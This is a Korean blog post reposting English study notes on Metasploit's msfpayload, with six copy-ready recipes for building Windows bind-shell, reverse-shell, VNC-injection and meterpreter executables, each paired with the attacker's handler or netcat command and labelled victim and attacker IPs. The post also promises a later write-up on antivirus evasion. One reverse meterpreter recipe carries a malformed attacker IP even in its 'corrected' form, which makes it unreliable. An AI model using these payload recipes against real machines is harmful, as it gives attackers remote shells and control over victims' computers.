'msfpayload' 태그의 글 목록

Notice

About me

Recent Trackbacks

« 2024/04 »
일	월	화	수	목	금	토
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30

'msfpayload'에 해당되는 글 1건

2012.07.21 [Metasploit] Msfpayload

[Metasploit] Msfpayload

공부/Forensics 2012. 7. 21. 17:24 |

Metasploit Payloads - msfpayload

This entry is really just a place for me to keep notes on working msfpayload details. I will expand on this post as i get more working examples.

These payloads will be detected by AV, I will cover methods of avoiding AV detection in another post.

In my examples 192.168.1.110 is the victim, and 192.168.1.112 is the attacker. Where I have not specified the port it will default to 4444.

1. For a listening shell on the target

Create payload:

./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe

Target:

run Listen-shell.exe

Hacker:

nc 192.168.1.110 2482

2. For a reverse shell on the target

Create payload:

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe

Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E

Target:

run reverse-shell.exe

3. For a VNC listener on target

Create payload:

./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe

Target:

run Listen-vnc.exe

Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E

4. For a reverse VNC session

Create payload:

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe

Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E

Target:

run reverse-vnc.exe

5. For a meterpreter listener

create payload:

./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe

Target:

run met-listen.exe

Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E

6. For a reverse meterpreter connection (not working yet. not sure why)

Create payload:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 X > /tmp/met-reverse.exe

Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E

Target:

run met-reverse.exe

UPDATE: Payload should for 6 should read:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 LPORT=4444 X > /tmp/met-reverse.exe

출처 - http://synjunkie.blogspot.kr/2008/10/metasploit-payloads-msfpayload.html

저작자표시 비영리 변경금지

'공부 > Forensics' 카테고리의 다른 글

[Metasploit]Meterpreter API Cheat Sheet (0)	2012.07.26
[Forensics]Live Response (1)	2012.07.25
[Metasploit]Meterpreter (Reverse exe) (4)	2012.07.21
[Windows]Userdump.exe (0)	2012.07.19
[Windows]Nbtstat.exe (0)	2012.07.19

Posted by extr

PREV 1 NEXT

Notice

Category

Tags

Recent Posts

Recent Comments

Recent Trackbacks

Archives

Links

'msfpayload'에 해당되는 글 1건

[Metasploit] Msfpayload

'공부 > Forensics' 카테고리의 다른 글

티스토리툴바